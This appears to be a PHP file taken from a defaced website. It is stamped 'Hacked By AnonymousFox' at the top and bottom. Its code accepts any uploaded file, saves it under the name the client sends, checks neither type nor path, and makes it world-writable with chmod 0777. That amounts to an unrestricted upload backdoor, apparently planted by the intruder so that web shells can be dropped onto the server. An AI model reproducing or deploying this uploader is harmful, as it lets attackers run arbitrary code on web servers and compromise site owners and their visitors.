Hacked By AnonymousFox
<?
include("lib/session.php");
include("lib/config.php");
include("lib/function.php");
if($Jigsaw_Session_UploadPath<>"") {
if(!is_dir("./".$Jigsaw_Session_UploadPath)) mkdir("./".$Jigsaw_Session_UploadPath, 0755);
$myFilename = UTF8toiso8859_11($_FILES['Filedata']['name']);
move_uploaded_file($_FILES['Filedata']['tmp_name'], "./".$Jigsaw_Session_UploadPath."/".$myFilename);
chmod("./".$Jigsaw_Session_UploadPath."/".$myFilename, 0777);
}
?>
Hacked By AnonymousFox1.0, Coded By AnonymousFox